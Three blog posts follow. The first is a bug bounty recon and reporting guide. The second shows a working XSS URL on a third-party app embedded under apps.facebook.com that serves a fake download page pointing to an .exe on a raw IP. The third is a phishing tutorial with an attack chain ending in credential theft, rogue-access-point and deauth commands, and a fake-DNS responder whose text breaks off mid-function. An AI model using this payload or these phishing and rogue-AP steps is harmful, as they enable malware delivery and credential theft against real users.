A beginner's guide to bug bounties

This blog post will focus on how to improve the overall quality of your reports, where to look for bugs in companies that run a bug bounty programme, and the steps to take regarding responsible disclosure of bugs that are eligible for a bounty.

This is not a guide on how to find bugs in a technical sense, but rather a set of tactics you can use to find bugs that haven't already been reported by someone else. In this post I'm assuming you already have pentesting knowledge and are capable of finding your own bugs, so I won't be explaining how to test for vulnerabilities, but rather where to test for them and how to structure your reports once bugs have been identified. This is mainly a general overview of how someone would map out a target site and efficiently perform reconnaissance to gain as much info on the site as possible before actually beginning their audit.

Other than recon, I won't be getting into methods for actually finding specific vulns themselves, although in the near future I plan on releasing a bunch of tutorials based around identifying and exploiting different kinds of web-based vulns.

What you need to remember about bug bounty programmes is that there is a lot of competition. This isn't the same as an audit for a conventional client: when performing an audit for a client, you're competing only against the security of the site you're auditing. When taking part in a bug bounty programme, you're competing against both the security of the site running the programme and hundreds or thousands of other people taking part in it. For this reason, it's important to think outside the box (as most researchers who have their reports constantly marked as dupes will know). This is also why passive and active reconnaissance is especially important for bounty programmes: you need to look a lot deeper than you would in a regular pentest to avoid dupes or stuff that's out of scope.

 

Which programme to choose:

I'm probably stating the obvious here, but some bug bounty programmes are way easier than others – ideally you want to choose a programme with a wide scope. For example, I see lots of people having success with Yahoo's bug bounty programme because the entire *.yahoo.com domain is within scope, rather than the bounty being limited to specific subdomains. You also ideally want to look for a programme that accepts a wider range of vulnerabilities (for example, many BBPs consider stuff such as open redirects or logout CSRF out of scope, whereas other bounties may accept these as valid submissions and even pay out for more minor stuff, i.e. enabled directory listings or missing HTTP security headers). The wider the attack surface and the wider the range of vulnerabilities considered valid, the higher the chance of a valid payout. Companies that have a large number of acquisitions within scope are also a good choice (more on this later).

You should also be aware of restrictions with bug bounty programmes (for example, the ability/inability to pay out based on which country you're in – many bounty programmes will refuse to pay out to people living in certain countries).

Sites like HackerOne and Bugcrowd are a good starting point for deciding which bounty programme you want to partake in (you'll probably also find yourself getting invites to private bounties after you've made a few valid submissions). xssposed.org is also a unique concept in the sense that anyone can potentially reward you for your work – it doesn't necessarily have to be the admin of the site, and the site doesn't even have to have a bug bounty programme (the admin could see your report, then choose an acceptable reward at their own discretion). Ideally you want to work towards access to private bounties (via Bugcrowd after reputation is gained, or via sites such as synack.com), as if the bounty is private, the chances of your submissions being marked as dupes are greatly diminished. There are also sites that have bounty programmes but don't openly advertise this (vmware.com being one example that comes to mind).

After choosing which bounty programme you’re going to attempt, the next logical step would be to map out your attack surface.

 

Mapping out an attack surface:

First off, ensure that you have properly read the terms of the bounty and clearly understand which domains are in scope and which forms of vulnerabilities are considered valid reports. One of the worst things you can do is submit things that aren't within the scope of the bounty programme – this tells the people running it that you haven't properly read the terms, and it will lead to them not taking your future reports seriously.

To begin testing efficiently, you're first going to have to perform as much passive/active recon as possible in order to effectively map out the site and give yourself an idea of how everything is structured.

The larger the potential attack surface, the higher the chance of finding a bug. Assuming all subdomains are within scope, one of the first steps is to enumerate valid subdomains (using recon-ng or an online subdomain scanner). The scanner I will be using can be found here: https://pentest-tools.com/information-gathering/find-subdomains-of-domain – if you're using this, be sure to select the 'include subdomain details' option, as that will give you an idea of how their network is mapped out (in addition to giving you the subdomains that you can begin testing on).
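If you'd rather roll your own than rely on an online scanner, wordlist-based enumeration is simple to sketch. The function below is a minimal illustration (the wordlist and the `enumerate_subdomains` name are my own, not from any particular tool); the resolver is injectable so it can be swapped out for testing:

```python
import socket

def enumerate_subdomains(domain, wordlist, resolve=socket.gethostbyname):
    """Return {subdomain: ip} for every wordlist entry that resolves."""
    found = {}
    for word in wordlist:
        candidate = "%s.%s" % (word, domain)
        try:
            found[candidate] = resolve(candidate)
        except OSError:  # NXDOMAIN or other resolution failure
            pass
    return found
```

In practice you'd feed this a large wordlist and note the returned IPs – they're the starting point for the port scans described below.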

Here is an example output of the online subdomain scanner listed above:

[Screenshot: example output from the online subdomain scanner]

Some companies will have entire IP address ranges dedicated to them. For example, looking at the output above, one could assume (not necessarily fact, just an assumption) that the 77.238.184.* range is owned by Yahoo, and therefore start performing port scans on that range (which brings me to my next point).

After mapping out the valid subdomains, you're going to want to perform port scans on each of the individual IP addresses associated with those domains. The most efficient way to do this is via nmap from the command line; a simple command will generally suffice:

nmap -T4 -A -v calendar.yahoo.com

Use the -Pn flag if the host is blocking your ping probes.

[Screenshot: nmap scan output]

It would be best to set something up to automate this – ideally you want to scan each individual IP address associated with their subdomains and have the output saved to a file. After this, look for any services running on unusual ports, or any service running on default ports which could be vulnerable (i.e. FTPd, SSHd, etc). You're also going to want to probe for version info on running services in order to determine whether anything is outdated and potentially vulnerable.
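A tiny wrapper is enough for that automation. This sketch (my own helper names, not a standard tool) builds the same nmap invocation shown above for each target and saves normal output with -oN; the runner is injectable so the command construction can be tested without actually scanning anything:

```python
import subprocess

def nmap_command(target, outfile, flags=("-T4", "-A", "-v")):
    """Build an nmap invocation that saves normal output to a file (-oN)."""
    return ["nmap", *flags, "-oN", outfile, target]

def scan_all(targets, runner=subprocess.run):
    """Scan every target in turn, writing each result to <target>.nmap."""
    for target in targets:
        # add "-Pn" to flags if the host drops ping probes
        runner(nmap_command(target, target + ".nmap"))
```

Feed it the list of subdomains/IPs from the recon stage and you end up with one output file per host to grep through for odd ports and version strings.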

Another thing to take into consideration when doing these scans is that reverse proxies such as Cloudflare or similar services may be active, in which case it would be necessary to resolve the backend IP addresses. This can actually lead to some nice findings: companies will assume that since their backend IP isn't public, they don't need to worry so much about locking down all of their services (i.e. leaving only ports 80 and 443 open), so determining the backend IP and then scanning it can definitely yield some interesting results (i.e. vulnerable/outdated services running on an open port).

For a site with a large attack surface, you’re really going to be wanting to make notes of everything during the reconnaissance stage to avoid confusion. Take them in whatever manner you want, but since participation in bug bounty programmes involves mainly blackbox testing, it is really important to get a feel of how the site is structured and to map it all out in order to be able to efficiently find bugs.

I'm sure any bug hunters reading this are more than capable of scanning for open ports/services and subdomains – I'm just reiterating it to stress its importance when trying to map out an attack surface on a large site. When looking for bounties, any low-hanging fruit you find is almost undoubtedly a duplicate (that being said, it's still worth reporting just in case), therefore it's a good idea to have the network mapped out and to look into any obscure services running on unusual ports.

In addition to this, it’s a good thing to see which security measures are in place before actually carrying out your pentest. By this I mean checking the headers to see which security options are in place, for example looking for presence of X-XSS-Protection: 1; mode=block or X-Frame-Options: deny – knowing what security measures are in place means you know your limitations, which is very helpful when trying to find something eligible for a bounty payout (allows you to be more time-efficient etc). It should also be noted that some bounty programmes even give you a payout for letting them know that certain security headers are missing, so if you see headers missing then that is worth looking into (although for most bounty programmes this will not be eligible).
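Checking for those headers is easy to script once you've captured a response. A minimal sketch (the `EXPECTED` list is my own non-exhaustive selection, and `missing_security_headers` is a hypothetical helper, not a standard library function):

```python
# Security headers worth flagging if absent (non-exhaustive, my own selection)
EXPECTED = {
    "X-XSS-Protection",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Content-Security-Policy",
    "Strict-Transport-Security",
}

def missing_security_headers(headers):
    """Given response headers as a dict, return the expected headers that are absent."""
    present = {name.title() for name in headers}  # normalize case: headers are case-insensitive
    return sorted(h for h in EXPECTED if h.title() not in present)
```

Run it against the headers of each subdomain from your notes – the output both tells you your limitations (e.g. X-Frame-Options present means clickjacking PoCs are out) and, on the rare programmes that pay for missing headers, gives you a ready-made list to report.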

Checking what security measures are in place also means determining the presence of a WAF. An effective way to do this is to use WafW00f, which can be found here – this will allow you to automatically perform fingerprinting to determine whether they have a WAF in place and, if so, what kind of WAF it is (assuming it's a commercial WAF).

You're also going to want to take note of the directory listings, and use something like DirBuster to map out the possible contents of directories that return HTTP 403 (use robots.txt to determine which directories may contain useful info – look for the disallow rules).
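Pulling the disallow rules out of robots.txt is a one-liner's worth of parsing; here is a rough sketch (the function name is my own, and it deliberately ignores per-user-agent grouping for simplicity):

```python
def disallowed_paths(robots_txt):
    """Extract Disallow rules from a robots.txt body.

    These paths are exactly what the site owner doesn't want indexed,
    which often makes them the most interesting directories to probe.
    """
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:  # an empty Disallow means "allow everything"
                paths.append(path)
    return paths
```

The resulting paths make a good seed list for DirBuster runs against each subdomain.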

Once this is done, you should have some notes somewhere with the name of each subdomain, and the following information:

  • Backend IP address
  • Open ports / services running
  • Service version info (if applicable)
  • Server banners
  • Directory listings
  • Presence (or lack) of security headers
  • Presence (or lack) of a WAF (+ WAF type)

After this, you're going to want to build upon these notes with more information (you can either do this all at the start, or test each subdomain one at a time and add the info then). You need to take note of all forms of accepted user input (GET/POST/cookies) so that you can probe these to check whether your inputs are properly escaped when it comes to actually testing for vulnerabilities – to automate this, just use Burp Suite or something similar (as long as it doesn't violate the terms of the bounty, more on this later).

In addition to this, since you’re primarily going to be blackbox testing, it’s a good idea to use OSINT to your advantage to build upon the notes. You need to gain as much information as possible about the backend technologies used by the target site.

First off, Google is your friend – I see a lot of people referring to those who use Google dorks as 'skids' or whatever, but if you're using TARGETED dorks then Google is an invaluable tool when it comes to pentesting.

For example, let's say that the site you're testing for the bug bounty programme has all domains in scope, except for their 'development' subdomain and their content delivery network. You want to perform more recon to see what kind of technologies are running on the domains that are in scope, so you could do something like this:

site:example.com filetype:php -development.example.com -cdn.example.com

while changing the filetype: value as appropriate to see which technologies are actually running on the site (this is also very useful during the stage of actually finding vulns, e.g. by adding inurl:search to then test all search boxes for XSS).
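If you're iterating over many filetypes and exclusions, it's worth generating the dork strings rather than typing them. A trivial sketch (the `build_dork` helper is my own invention):

```python
def build_dork(domain, filetype=None, exclusions=(), extra=""):
    """Assemble a targeted Google dork string for a bounty scope."""
    parts = ["site:%s" % domain]
    if filetype:
        parts.append("filetype:%s" % filetype)
    # prefix out-of-scope hosts with "-" to exclude them from results
    parts.extend("-%s" % host for host in exclusions)
    if extra:
        parts.append(extra)  # e.g. "inurl:search" when hunting for XSS entry points
    return " ".join(parts)
```

Loop it over a list of filetypes (php, aspx, jsp, …) and you get one copy-pasteable query per backend technology you want to check for.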

Another good way of determining which technologies are used on a site is by looking at the employment positions available – you can look for tech-related positions open at the company, and generally the listing will tell you what skills are required (naming specific programming languages and frameworks that are presumably in use). Here is a current employment position with Yahoo that I'm going to use as an example:

[Screenshot: Yahoo job advertisement]

From this job advertisement, you can tell that node.js is being used, Hadoop server clusters are in use, etc. All of this information is purely passive recon available through OSINT. Obviously nothing serious here – this one is just for example purposes – but I've literally seen job advertisements for corporations in the past disclosing the exact MySQL version.

Make sure to spend as much time as possible performing recon, until you have a pretty good feel for how the site operates – there are even occasions where passive recon can lead to the ability to whitebox, i.e. searching GitHub or Pastebin for the company name and stumbling across some random source code that ended up online after some sloppy dev wrote it.

It's also good to use OSINT to harvest emails/usernames associated with the target company, because you could put these together as part of a PoC for something related to auth bypass or bruteforcing (some bounty programmes accept 'the ability to bruteforce' as a valid submission – don't ever try to bruteforce their live systems though).

Another important point is to check whether any acquisitions are within the scope of the bug bounty, because these are often written in a different manner (a different dev team would have written a bunch of the code before it actually became an acquisition of the company in question). This means they can be less secure in many instances, and while the payouts are generally lower for acquisitions, the vulns will be easier to identify – plus there's the bonus of still getting Hall of Fame credit. Just check for any recent acquisitions, then use the steps detailed above to map them out like you did with the subdomains.

 

Finding the bugs:

In this section I will explain a few practices that should be followed when looking for bugs in a bug bounty programme (not an explanation of how to find them, but rather of what to do when you find them).

You're going to want to go through each section of the notes gathered while performing recon, checking off each domain one at a time as you test it for vulnerabilities (also, don't think the likes of XSS and SQLi will suffice – you need to be testing for all manner of vulns, even the uncommon ones, although obviously it depends on the context in which you are testing and the technologies you are testing against).

Avoid scanners. Port scanning, subdomain scanning or any form of scanning related to basic recon is fine. Using commercial vulnerability scanners such as Acunetix isn't. It should be obvious that the company will probably routinely scan their own systems for vulnerabilities which they can patch pre-emptively, but if that isn't obvious and you decide to use a scanner anyway, you're going to be dealing with countless false positives, any submission you do find is almost guaranteed to be a duplicate, and in addition many companies will disqualify you from their programme if they have reason to believe you're using a vuln scanner (which will be obvious to them from the headers – scanners are noisy). In most cases, something like Burp Suite for mapping all user inputs will be fine and won't breach any terms of the bounty.

In order to narrow down the kinds of vulnerabilities you're going to be looking for, it's always a good idea to read up on past reports relating to the company where people have had payouts. Look at what bypass methods they've used (if any) and gain an understanding of how exactly they exploited the vuln – if you get lucky, maybe the same dev working for the company has made the same mistakes in different scripts on different pages and it hasn't been patched there. Another good reason for reading past reports is that you can then look at the patch that was implemented to fix the issue, and see if there are any ways to bypass the patch and recreate the issue in order to get your payout.

Also, it's best not to instantly report a vulnerability the moment you find it, as there is a chance you could pivot into something more serious. For example, if you were to find an LFI and report it as just LFI, you'd get a lower payout than if you found the LFI, figured out how it could be turned into RCE, and then made the report. The same applies to other vulns such as XXE and SSRF – it's best to do some testing to see how far you can take the vulnerability before making the report (in order to ensure the max payout). By this I mean see what the potential of the vulnerability is, not exploit it and compromise the server (that will get you disqualified for sure).

You also need to remember to do your testing in a responsible manner (to avoid breaching bounty terms). For example, if you thought you'd found a potential RCE, you should verify it using some harmless command like whoami and then check the output to see whether the command was successfully executed (as opposed to doing something like rm -rf /). Also, when making your reports there's no need to disclose potentially sensitive information (even via private communications with the company) – for example, it makes a lot more sense to display the output of /etc/hosts as proof of file inclusion rather than the output of /etc/shadow.

Another point to remember is that if you see a vulnerability being blocked by a WAF, don’t assume it can’t be exploited – if you manage to bypass the WAF and get a working PoC to exploit the vulnerability then you’ll still get a payout (and probably also a payout or some swag from the WAF company too). Don’t think they’ll just be like “oh yeah that WAF wasn’t coded by us so we’re not paying you” because regardless of whether the WAF is present, the issue remains in the vulnerable code to begin with. The WAF is just an extra layer of protection.

 

Making the report:

If you find something valid, you really need to make your report stand out (but don't overdo it) – you want to explain the risk to the fullest extent, and do so in a clear and concise manner.

Don't just paste the links to the vulnerability and give an explanation of its risks – show them the risks. For example, if you were to find an XSS-vulnerable page, first show the URL alerting document.domain (as opposed to a typical PoC of alert(0)) to demonstrate exactly which domain is vulnerable (and to verify that it isn't sandboxed), then maybe send a second URL below it with a crafted fake login page and explain that it's a demonstration of the potential phishing risk posed by the vulnerability.

Some companies appreciate video PoCs; others (Google is an example) tell you to keep your PoC as short as possible if you do make one, and suggest that you explain it via text instead. If you think a video PoC will convey your report better than words will, then go for it. Their terms will probably state their preference, and certain companies would much prefer a video PoC and consider it the more professional report.

One thing almost all companies will want to see in a submission is numbered, step-by-step instructions on exactly how to reproduce the vulnerability – these need to be clear to read and easy to follow.

Also, be thoughtful about the email address you use to make your report – it's best to use your real name instead of your leet hacker handle (lol), as they'll take your report way more seriously. It should also be noted that if you've made valid reports to the company before, it's best to contact them via the same email address when more vulnerabilities are found. Most companies running bounties will prioritize reporters who have consistently made valid reports, so their submissions are seen to first (this is especially applicable with crowdsourced bug bounty platforms such as HackerOne and Bugcrowd).

Ensure that your report isn't too short or too long, that spelling and grammar are accurate, and that it gets to the point, describing in exact detail the severity of the vulnerability and the steps to reproduce it.

While you're waiting to hear the outcome of your report, make sure not to disclose the vulnerability to anyone, and definitely don't post it online anywhere – you'll instantly lose any chance of receiving a payout. Even if the vulnerability you disclose is out of scope, and you had other valid in-scope submissions that you didn't disclose, there's still the risk of losing the entire payout due to violation of the bounty terms.

 

Final Words:

Bug reporting can be hard. It can be time consuming, and while you can assume time = money, sometimes you can work for months on a submission only to find out it's a duplicate of something previously reported. Other times you can make thousands of dollars for 10 minutes' work.

Expect to be disappointed often, sometimes you will put in a lot of hard work only to end up with nothing. Other times you will get the easy cash payouts that you’ve been waiting for. You can also expect to hear the word ‘duplicate’. A lot. That being said, it’s a good learning curve, it can be fun, and you can make a lot of money if you get good at it.

If you come from a blackhat background, or even a background as a pentester who audits companies, then you're going to find bug bounties harder than what you were previously doing, mainly due to the limited scope. In order to perform a successful attack against a normal target, you could use a variety of methods (targeting employees, targeting the DNS provider, etc); the limited scope of a bounty programme prevents you from doing this – you have to look for a vulnerability that is within scope, on a domain that is also within scope. That being said, it's way more rewarding (at least while staying on the right side of the law).

I’ll be doing a series of posts soon which will go in-depth into the actual techniques used while testing for vulns, rather than just the recon aspect of it.

Good luck and happy hunting

-M.

Using the Facebook domain to serve malware

This will be a short post detailing how the Facebook domain can be used to serve malware and spear phish unsuspecting users.

I guess this is common knowledge to anyone who has looked into Facebook's VRP, but the apps.facebook.com domain is used for embedding third-party content (i.e. websites that aren't Facebook) onto a page with the Facebook banner on it. Although this is not within the scope of their VRP, it is still a security risk – despite the fact that the vulnerabilities would be within external websites rather than Facebook, the outcome of those vulnerabilities (think XSS / HTML injection) would be displayed under the facebook.com domain and under the Facebook banner that regular users have grown accustomed to. When naive internet users read up on how to prevent their accounts from being stolen, they are warned of phishing attacks and told to always check the URL to make sure it's spelled correctly – so when such a user sees the correctly spelled URL, they'll assume it's completely legitimate and accept it as a trusted source.

You may be wondering why Facebook doesn’t just disallow this content to be embedded under their apps domain, and the answer to that is simple – it would have a detrimental effect on the functionality of the site itself. Most people in infosec are undoubtedly already familiar with this concept, but for those who aren’t, here is a simple diagram that explains it:

[Diagram: the security/functionality/usability triangle]

“Why is it represented as a triangle? If you start in the middle and move to the point toward Security, you’re moving further away from Functionality and Usability. Move the point toward Usability, and you’re moving away from Security and Functionality. Simply put, as security increases, the system’s functionality and ease of use decrease”

Basically, Facebook are probably already aware of the potential risk here, but have had to decide whether the risk outweighs the functionality of this feature – and they have evidently decided that it does not (although I'm sure many people will disagree).

In order for an attacker to use this to their advantage, they would first have to identify a cross site scripting vulnerability in a site that has its content embedded under the apps domain of Facebook. Using some basic google dorks would be the most efficient way to do this, something like:

site:apps.facebook.com filetype:php inurl:search

After that, it's a case of finding a suitable vulnerable site that has its content embedded under this domain. For the purposes of this explanation, I will be using the following site:

https://apps.rezonux.com/caricature/view.php

Note how the site is accessible under the Facebook domain (with the Facebook banner conveniently added):

https://apps.facebook.com/caricatura/view.php

An attacker could easily craft a malicious URL that looks like it’s part of Facebook, when in reality it is exploiting a vulnerability on a third party website in order to serve malicious content to an unsuspecting user.

Although someone could in theory create their own page embedded under this domain (through legitimate means, i.e. their own Facebook app), serving malicious content in this manner isn't exactly viable, as the Facebook staff would catch on and delete the app. Looking for vulnerabilities in currently existing apps and then crafting a one-time link that serves the malicious content is a more viable option, since there is no malicious page for the Facebook admins to see (unless it's reported to them with screenshots of the URL).

Below is an example page designed to demonstrate how the Facebook domain could be used to serve malware (note that in a real attack, time would be spent making both the content on the page and the URL itself more convincing – this is just for demonstration purposes):

https://apps.facebook.com/caricatura/view.php?friend=501337&effect=&x=&y=%22/%3E%3Cimg+src=x%20onerror=%22document.body.innerHTML=%27%3Ccenter%3E%3Cfont%20face=Arial%20color=black%20size=75%3EDownload%20the%20new%20Facebook%20desktop%20app%20here%20%28beta%20version%29:%3Cbr%3E%3Cbr%3E%3Ca%20href=http://45.55.162.179/evil.exe%3EDownload%20Now%3C/a%3E%3C/font%3E%3Cfont%20size=20%20color=black%3E%3Cbr%3E%3Ch6%3EIf%20you%20have%20trouble%20downloading,%20please%20hold%20down%20the%20CTRL%20key%20when%20clicking%20the%20link%3Cbr%3E%3Cbr%3EPlease%20submit%20any%20feedback%20%3Ca%20href=http://lol.com%3Ehere%3C/a%3E%3C/h6%3E%20%3C/font%3E%27;document.body.style.background=%27white%27%22%3E

Take note that this will only work in Firefox – Chrome's XSS auditor will definitely catch it.

Screenshot:

[Screenshot: the injected fake 'Facebook desktop app' download page rendered under apps.facebook.com]

You should also note that in this example, the download link isn't actually a malicious file (but rather an empty file with a .exe extension – once again, for demonstration purposes).

In this case, Facebook have definitely chosen functionality over security, and the trade-off they have made makes targeted phishing campaigns against Facebook users stupidly easy.

Below is a video PoC, demonstrating how the attack would play out:

 

That’s all for now, thanks for reading

– M

 

 

 

An intro to advanced phishing techniques

First off, sorry for the delay with writing this – been distracted with lots of IRL stuff and it took me over a month to actually get around to posting this (even though it was pretty much written a month ago). I’ll be updating this blog a lot more regularly from here onwards.

My last three posts have been the results of my findings testing against sites in the wild, this post will differ in the sense that it is more of a short tutorial.

NOTE: this is supposed to be a basic tutorial for beginners who may not already know of these methods, so apologies if you were expecting to learn something new.

In my previous post I demonstrated the steps required to setup a spear phishing attack using WebHTTrack – in this post I am going to discuss some of the more obscure and sophisticated methods of phishing which are less well known to those new to the infosec community.

I won't bother going into methods such as spear phishing or typosquatting too much – the main methods I will be covering are bitsquatting, LAN-based phishing and IDN homograph attacks.

 

Bitsquatting:

While methods such as typosquatting rely upon human error (for example a user hitting the wrong key while entering their URL of choice), bitsquatting instead relies upon machine error.

To fully understand the concept of bitsquatting, you must first understand the concept of bit errors. When bits are transmitted across a data stream, there is a slim chance that the contents of a device's memory can be altered (by a single bit); the factors that cause this can vary, but they include interference, bit synchronization errors, faults within memory modules, distortions, etc.

Let me use an example to demonstrate this:

take the following domain example.com

here is the binary representation of example.com:

01100101 01111000 01100001 01101101 01110000 01101100 01100101 00101110 01100011 01101111 01101101

lets assume that a bit error takes place, and the last bit of the 5th byte (01110000, the letter p) is flipped:

01100101 01111000 01100001 01101101 01110001 01101100 01100101 00101110 01100011 01101111 01101101

while the user entered example.com into their browser's address bar, the bit error would instead cause examqle.com to be loaded, through no fault of the user.
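Enumerating every domain that is one bit-flip away from a target is straightforward to script. The sketch below is my own illustration (the `bitsquat_variants` name is invented, and the character filter is deliberately rough – it doesn't validate label structure such as leading/trailing hyphens or dots):

```python
import string

# characters that can legally appear in a hostname (rough filter)
ALLOWED = set(string.ascii_lowercase + string.digits + "-.")

def bitsquat_variants(domain):
    """Return every domain exactly one bit-flip away that still uses valid hostname characters."""
    variants = set()
    for i, ch in enumerate(domain):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))  # flip a single bit of this byte
            if flipped in ALLOWED:
                variants.add(domain[:i] + flipped + domain[i + 1:])
    return variants
```

Running this over example.com yields examqle.com among the candidates (the p/q flip shown above); the registrable ones are the domains an attacker would squat on.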

While bit errors are uncommon, you should bear in mind that there are several stages in loading a web site at which there is a risk of a bit error (when your OS performs DNS resolution, when your browser parses HTML or makes the initial HTTP request, etc).

In order to exploit this successfully, an attacker would have to bear in mind that the chances of bit errors taking place are relatively slim, therefore the attack would have to be performed on domain names that receive a lot of traffic or are frequently resolved – the best choice of domain would be something like an ad server or a content delivery network for a large site (also root nameservers ftw??). Another factor to bear in mind is that the success of a bitsquatting attack is largely dependent on where the bit errors take place – for example, a bit error in something like a popular proxy server or DNS resolver would affect a much larger number of people than a bit error occurring locally on a single person's machine.

Although bitsquatting isn't a commonly used attack vector, domains that are frequently resolved are at the most risk. It should also be noted that many government sites (including US court systems for almost every state!) use publicly available TLDs (rather than .gov), which puts them at risk of this kind of attack (due to the fact that .us is publicly available). These sites could contain potentially sensitive info (I see some of them having forms in which users can be prompted to enter their social security numbers, among other things), and this risk could be easily mitigated by switching to TLDs which aren't publicly available. Here are some examples of government sites registered under public TLDs:

(google dork):

site:us inurl:state

It should also be noted that this threat can potentially be mitigated by choosing one of the new gTLDs for your domain name. Another point to make is that obviously it isn't only alphanumeric characters that are susceptible to bitsquatting; take the following domain for example:

http://state.co.us

At first one might assume they were limited if they wanted to perform a bitsquatting attack on this site: co.us is already registered, so it would seem impossible to register a domain that takes advantage of bit errors here. But this is not the case. Someone could register statenco.us and take advantage of bit errors which flip one bit of the . (dot, 0x2E) in state.co.us, turning it into n (0x6E), so that a victim intending to resolve state.co.us ends up on the attacker's statenco.us instead.
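Enumerating viable bitsquat domains is easy to automate. Here is a quick Python sketch (the function name and character whitelist are my own) that flips every single bit of each character in a domain and keeps only the results that are still valid hostname characters:

```python
import string

def bitsquats(domain: str):
    """Yield every domain produced by flipping a single bit of one character,
    keeping only results that are still valid hostname characters."""
    valid = set(string.ascii_lowercase + string.digits + "-.")
    for i, ch in enumerate(domain):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped != ch and flipped in valid:
                yield domain[:i] + flipped + domain[i + 1:]

# Both examples from the text fall out of this:
# 'p' (0x70) with bit 0 flipped is 'q', giving examqle.com;
# '.' (0x2E) with bit 6 flipped is 'n', giving statenco.us.
```

Running it against example.com and state.co.us produces the examqle.com and statenco.us candidates discussed above, among a few dozen others.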

 

IDN Homograph attacks:

This is a fairly interesting attack vector which takes advantage of similar looking characters in ASCII/Unicode domain names

For example, in a domain name such as google.com, the o's could be made up of either the Greek letter Ο, the Latin letter O or the Cyrillic letter О. As you can see, these all look practically identical to each other, yet they have entirely different Unicode representations.

Here is a live example using PayPal (it should be noted that PayPal and its users have fallen victim to IDN homograph attacks in the recent past):

http://www.paypal.com

The domain above will take you to paypal.com, whereas the domain below will fail to resolve (due to the fact that it is not actually paypal.com):

http://www.pаypal.com

If you were to copy the link URL of the above domain, you would see that it is actually http://www.xn--pypal-4ve.com/ while at first glance it appears to look like paypal.com
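You can reproduce that punycode conversion yourself. A quick sketch using Python's built-in idna codec, with the Cyrillic а written as its escape U+0430 so the spoof is visible in source:

```python
# "pаypal" spelled with a Cyrillic а (U+0430) vs the all-Latin original
spoofed = "p\u0430ypal"
real = "paypal"

# Visually identical, but different code points...
assert spoofed != real

# ...and a different wire form once IDNA-encoded:
print(spoofed.encode("idna"))   # b'xn--pypal-4ve'
print(real.encode("idna"))      # b'paypal'
```

The xn-- prefix marks an internationalised label, and everything after the final hyphen is the punycode-compressed encoding of the non-ASCII characters.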

The main defence against IDN homograph attacks is punycode. This is what you see when you hover over a URL, and it displays the domain name in its true form; to see what I'm referring to, just hover your mouse over both of the 'paypal' URLs above and look at the bottom corner of your browser to see their representation in punycode.

The vast majority of modern browsers have IDNA support disabled by default, meaning that when the URL is actually loaded the user will see the phony URL in their address bar. To make the attack more convincing, an attacker could set up a redirect so that xn--pypal-4ve.com redirects to a more authentic-looking domain (at least at first glance), some examples being as follows:

and so on…

If the site being targeted has an open redirect vulnerability, then it could be chained together with the fraudulent domain so that when the link is hovered over, a more legitimate looking domain is displayed via the punycode.

These methods chained together with some more conventional methods can make for a pretty effective phishing campaign. Here is an example attack scenario:

  • Attacker obtains a list of victims
  • Attacker finds and utilizes an open redirect in the site targeted within the phishing campaign
  • Attacker registers a domain that allows an IDN homograph attack to take place
  • Attacker sets up DNS redirect to have the domain redirected to a domain that looks similar to the site targeted in the phishing campaign
  • Attacker then chains the open redirect with the link to the site used for the IDN homograph attack
  • Attacker crafts spoofed emails containing the link and sends mass mail to the list of victims
  • Victim opens the email and assumes it's from the target site (due to the email address being valid + the URL actually being part of the site, w/ punycode bypassed due to the fact a redirect is being used)
  • Victim is redirected from the site used for the IDN homograph attack to a phishing page registered on a domain that looks similar to the target site
  • Victim logs in
  • Attacker steals credentials

 

LAN-Based Phishing:

This is similar to spear phishing, but rather than requiring an XSS vulnerability in the site you want to phish, it instead requires that you have access to the victim's LAN (which would entail either cracking their WEP/WPA2 key or using some method to gain access remotely, e.g. via a remote access tool). The fact that this requires LAN access means that entering their data into a phishing site is probably the least of the victim's worries. That being said, it's probably still worth covering.

Although I used httrack in previous posts to get a mirror of the site, the simplest way to phish over LAN would be to use SEToolkit (aka SET). To use SET, install it via whatever your distro requires (apt-get/yum/pacman etc.), then cd to the install directory and type ./set to run it. Have a play around with the 'clone site' feature.

There are many issues with the method above, and you can perform a far more effective DNS-based phishing campaign (i.e. one that doesn't display local IPs in the browser) with some basic tools. In this example I will explain how to achieve it using aircrack-ng and MSF's (Metasploit's) 'fakeDNS' aux module.

First off, you'd need to connect to the LAN in question (whether it's a public hotspot, or someone's home connection and you're in close proximity to their house). After this you're going to need to set your wireless card to monitor mode; to do this you can use the tool airmon-ng (found within the aircrack-ng suite).

run the following command to create a new monitor interface:

airmon-ng start wlan0

to start monitoring on the interface, airodump-ng should be used, run the following command to begin monitoring:

airodump-ng mon0

After this, you will need to find a hotspot with clients connected to it. The plan is to create a rogue access point that mimics this hotspot, to get the clients to connect to you instead of the hotspot itself. But first, you need to configure your DHCP server like so:

cd /etc/dhcp3

cat dhcpd.conf

In the config file, you’re going to be looking for the following option:

option domain-name-servers 1.1.1.1;

Open nano/vim/whatever the fuck you want, then change this line so that the IP address is replaced with your own IP (or at least the IP you’re going to be running the FakeDNS module off of)

to create the rogue access point, we’re first going to be using airbase-ng to make a soft access point using the following command:

airbase-ng -e freenet mon0

Next, install the FakeDNS aux module for Metasploit and ensure that its options are correct (simply google for a correct setup, there's a bunch of documentation). Once it's running, assign an IP to the tap interface for the soft access point created via airbase-ng; to do so you'll need the following commands:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

After this, the final step is to deauth-flood the victim, which will cause them to disconnect from the legitimate access point and reconnect to your rogue access point. aireplay-ng can be used to achieve this via the following command:

aireplay-ng --deauth 100 -a MAC:FOR:ACCESS:POINT -c MAC:FOR:CLIENT:VICTIM mon0

After running this command, you should see in the airbase-ng output the victim connecting to your rogue access point (identifiable via MAC address).

Once the victim tries to navigate to the site you're spoofing w/ FakeDNS, they will be redirected to your phishing page and their credentials logged. And that's all there is to it.
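For the curious, the core of what a fake-DNS module does is tiny: answer every A-record query with the attacker's IP. Here is a rough Python sketch of that idea, not Metasploit's actual implementation; the attacker IP is the hypothetical at0 address from above, and EDNS/other record types are ignored for brevity:

```python
import socket
import struct

ATTACKER_IP = "10.0.0.1"  # hypothetical: the rogue AP's at0 address

def build_spoofed_response(query: bytes, spoof_ip: str) -> bytes:
    """Build a DNS response answering any A query with spoof_ip."""
    txid = query[:2]                            # copy the transaction ID
    flags = struct.pack(">H", 0x8180)           # response, RA set, no error
    counts = struct.pack(">HHHH", 1, 1, 0, 0)   # 1 question, 1 answer
    question = query[12:]                       # echo the question section
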